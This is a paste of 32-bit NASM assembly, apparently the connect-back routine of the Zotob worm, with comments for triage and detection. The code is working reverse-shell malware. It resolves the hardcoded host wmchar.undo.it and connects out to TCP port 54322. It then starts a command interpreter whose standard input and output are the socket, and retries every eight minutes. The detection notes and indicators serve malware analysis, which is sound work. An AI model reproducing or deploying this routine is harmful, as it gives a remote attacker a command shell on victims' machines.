FlyFar

Cback.asm

Jun 6th, 2023
ASM (NASM) 2.05 KB | Cybersecurity | 0 0
  ; Assembler settings, data and constants used by the @Cback routine below.
  ; Syntax: NASM, 32-bit x86. The page tags this paste "worm zotob".
  ; For triage, the network indicators visible in this listing are the hostname
  ; in CBACK_HOST and the TCP port in CBACK_PORT.
  1. CPU 386
  2. [BITS 32]
  3.  
  4. section .rdata
  5.  
      ; NUL-terminated hostname; @Cback passes it to gethostbyname.
  6. CBACK_HOST  DB  'wmchar.undo.it',0
  7.  
  8.  
  9. section .text execute
  10.  
      ; Timing values are in milliseconds (they are passed to Sleep / used as a ratio).
  11. %xdefine        CBACK_TIMEOUT   ((8*60)*1000)   ; 480000 ms = 8 minutes: total wait between connection attempts
  12. %xdefine        CBACK_CHK_CONN  (10*1000)   ; 10000 ms = 10 seconds: length of one Sleep slice within that wait
  13. %xdefine        CBACK_PORT  54322   ; TCP port, host byte order; byte-swapped where the sockaddr is built
  14.  
  15.  
  16.  
  ;-----------------------------------------------------------------------
  ; @Cback -- outbound "connect-back" routine (page tags: worm, zotob).
  ;
  ; What the visible code does:
  ;   1. Waits on the mutex handle stored at MTX_CBACK with a zero timeout
  ;      and leaves if the wait does not return 0.
  ;   2. Gets the module named by STR_WS2_32 (loading it if it is not
  ;      already loaded) and resolves the export named by STR_WSASocket.
  ;   3. Resolves CBACK_HOST, creates a TCP socket and connects it to
  ;      CBACK_PORT on the first address returned.
  ;   4. If connect succeeds, starts the command line STR_CMD with the
  ;      socket as its stdin/stdout/stderr, waits for that process to end
  ;      and closes its handles.
  ;   5. After a failed connect or after the child ends, closes the socket,
  ;      sleeps in CBACK_CHK_CONN slices for up to CBACK_TIMEOUT and goes
  ;      back to step 3. If the dword at CONNECTED reads 0 after a slice,
  ;      the thread exits instead.
  ;
  ; Not defined in this listing: MTX_CBACK, STR_WS2_32, STR_WSASocket,
  ; STR_CMD, CONNECTED and the imported API names. STR_CMD is presumably a
  ; command interpreter path -- confirm against the rest of the sample.
  ;
  ; Registers: ebp = frame base (the old ebp is not saved), ebx = socket,
  ;            edx holds the caller's edi across .createprocess.
  ; Returns:   never; every exit path ends in ExitThread, so this looks
  ;            like a thread start routine (caller not shown).
  ;
  ; Detection notes: a DNS lookup for CBACK_HOST, an outbound TCP connection
  ; to port 54322, and a child process whose three standard handles are one
  ; socket handle are the observable behaviours of this routine.
  ;-----------------------------------------------------------------------
  17. @Cback:
  18.     mov ebp, esp                    ; frame base; no "push ebp" because the routine never returns
  19.     sub esp, 0x10                   ; 16 bytes of locals
  20.  
      ; Local slot that holds the resolved WSASocket function pointer.
  21. %define     _WSASocket  [ebp - 4]
  22.  
      ; --- single-instance guard: WaitForSingleObject([MTX_CBACK], 0) ---
  23.     push 0                          ; dwMilliseconds = 0: poll, do not block
  24.     push DWORD [MTX_CBACK]          ; hHandle
  25.     call WaitForSingleObject
  26.     or eax, eax                     ; 0 = WAIT_OBJECT_0 (mutex acquired)
  27.     jnz .exit                       ; any other result: leave
  28.  
      ; --- locate the Winsock module: already loaded, else load it ---
  29.     mov esi, STR_WS2_32             ; esi = module name string (defined elsewhere)
  30.     push esi
  31.     call GetModuleHandle
  32.     or eax, eax
  33.     jnz .ws2                        ; module already mapped in this process
  34.  
  35.     push esi
  36.     call LoadLibrary
  37.     or eax, eax
  38.     jz .exit                        ; load failed
  39.  
      ; --- resolve the export dynamically instead of importing it ---
  40. .ws2
  41.     push STR_WSASocket              ; lpProcName (string defined elsewhere)
  42.     push eax                        ; hModule
  43.     call GetProcAddress
  44.     or eax, eax
  45.     jz .exit                        ; export not found
  46.  
  47.     mov _WSASocket, eax             ; keep the function pointer in the local slot
  48.  
      ; --- resolve the callback host (re-entered on every retry) ---
  49. .gethost
  50.     push CBACK_HOST
  51.     call gethostbyname
  52.     or eax, eax
  53.     jz .exit                        ; NULL hostent: name did not resolve
  54.  
  55.     mov esi, [eax + 0xC]            ; esi = hostent.h_addr_list (offset 12 in the 32-bit struct)
  56.     lodsd                           ; eax = first entry of the address list
  57.     mov eax, [eax]                  ; eax = first IPv4 address, network byte order
  58.  
      ; --- build a 16-byte sockaddr_in on the stack (pushed last field first) ---
  59.     xor edx, edx                    ; edx = 0, reused for every zero argument below
  60.     push edx                        ; sin_zero, upper 4 bytes
  61.     push edx                        ; sin_zero, lower 4 bytes
  62.     push eax        ; sin_addr = resolved IP
      ; low word 2 = AF_INET; high word = CBACK_PORT byte-swapped to network order
  63.     push DWORD (2 | ((((CBACK_PORT << 8) & 0xFF00) | ((CBACK_PORT >> 8) & 0xFF)) << 16)  )
  64.  
      ; --- WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0) via the resolved pointer ---
  65.     push edx                        ; dwFlags = 0
  66.     push edx                        ; g = 0
  67.     push edx                        ; lpProtocolInfo = NULL
  68.     push edx                        ; protocol = 0
  69.     push byte 1                     ; type = 1 (SOCK_STREAM)
  70.     push byte 2                     ; af = 2 (AF_INET)
  71.     call DWORD _WSASocket
  72.     xchg ebx, eax                   ; ebx = socket; the return value is not checked here
  73.  
      ; --- connect(socket, &sockaddr_in, 16) ---
  74.     mov edx, esp                    ; edx = address of the sockaddr_in built above
  75.     push byte 0x10                  ; namelen = 16
  76.     push edx                        ; name
  77.     push ebx                        ; s
  78.     call connect
  79.     add esp, byte 0x10              ; drop the 16-byte sockaddr_in from the stack
  80.     or eax, eax                     ; connect returns 0 on success
  81.     jz .createprocess
  82.  
      ; --- failed connect, or the child process has ended: close and wait ---
  83. .retry
  84.     push ebx
  85.     call closesocket
  86.  
  87.     push byte (CBACK_TIMEOUT / CBACK_CHK_CONN)   ; 480000 / 10000 = 48 slices
  88.     pop ecx                         ; ecx = slice counter
  89.  
      ; --- one Sleep slice per iteration; ecx is saved around the call ---
  90. .sleep
  91.     push ecx
  92.     push CBACK_CHK_CONN
  93.     call Sleep
  94.     pop ecx
  95.     cmp DWORD [CONNECTED], 0        ; flag defined elsewhere; its meaning is not visible here
  96.     je .exit                        ; flag reads 0: stop the callback thread
  97.  
  98.     loop .sleep                     ; dec ecx; repeat until all slices have elapsed
  99.     jmp short .gethost              ; then resolve the host again and reconnect
  100.  
      ; --- common exit: ReleaseMutex([MTX_CBACK]); ExitThread(0) ---
  101. .exit
  102.     push DWORD [MTX_CBACK]
  103.     call ReleaseMutex
  104.  
  105.     push BYTE 0                     ; dwExitCode = 0
  106.     call ExitThread
  107.  
  108.  
      ; --- connected: start STR_CMD with the socket as its standard handles ---
      ; On entry eax = 0 (connect succeeded) and ebx = socket.
  109. .createprocess
  110.     push byte 0x11
  111.     pop ecx                         ; ecx = 0x11 dwords = 0x44 bytes = sizeof(STARTUPINFO)
  112.     mov edx, edi                    ; keep the incoming edi; restored at line 130
  113.     mov edi, esp                    ; edi = STARTUPINFO, placed at the current stack top
  114.     lea esi, [edi + 0x44]           ; esi = PROCESS_INFORMATION, directly after it
  115.     push esi                        ; CreateProcess arg 10: lpProcessInformation
  116.     push edi                        ; CreateProcess arg 9:  lpStartupInfo
  117.  
  118.     push edi
  119.     rep stosd                       ; zero the STARTUPINFO (eax = 0); leaves ecx = 0
  120.     pop edi                         ; edi back to the start of the structure
  121.  
  122.     mov byte [edi], 0x44            ; cb = 0x44
  123.     inc byte [edi + 0x2c]   ; dwFlags |= 0x001 STARTF_USESHOWWINDOW; wShowWindow stays 0 from the zero fill
  124.     inc byte [edi + 0x2d]   ; dwFlags |= 0x100 STARTF_USESTDHANDLES
  125.     lea edi, [edi + 0x38]           ; edi = &hStdInput
  126.     mov eax, ebx                    ; eax = socket handle
  127.     stosd                           ; hStdInput  = socket
  128.     stosd                           ; hStdOutput = socket
  129.     stosd                           ; hStdError  = socket
  130.     mov edi, edx                    ; restore the incoming edi
      ; Remaining CreateProcess arguments, pushed right to left (ecx = 0 = NULL).
  131.     push ecx                        ; lpCurrentDirectory = NULL
  132.     push ecx                        ; lpEnvironment = NULL
  133.     push ecx                        ; dwCreationFlags = 0
  134.     push eax    ; bInheritHandles: the non-zero socket value serves as TRUE
  135.     push ecx                        ; lpThreadAttributes = NULL
  136.     push ecx                        ; lpProcessAttributes = NULL
  137.     push STR_CMD                    ; lpCommandLine (string defined elsewhere)
  138.     push ecx                        ; lpApplicationName = NULL
  139.     call CreateProcess              ; the return value is not checked
  140.  
      ; --- wait for the child to exit, then close both of its handles ---
  141.     lodsd                           ; eax = PROCESS_INFORMATION.hProcess; esi now points at hThread
  142.     push eax                        ; argument for the first CloseHandle below
  143.     push byte -1                    ; dwMilliseconds = INFINITE
  144.     push eax                        ; hHandle = hProcess
  145.     call WaitForSingleObject
  146.  
  147.     call CloseHandle                ; CloseHandle(hProcess), using the value pushed at line 142
  148.     push DWORD [esi]                ; hThread
  149.     call CloseHandle
  150.  
  151.     jmp short .retry                ; session over: close the socket and wait before reconnecting
Tags: worm zotob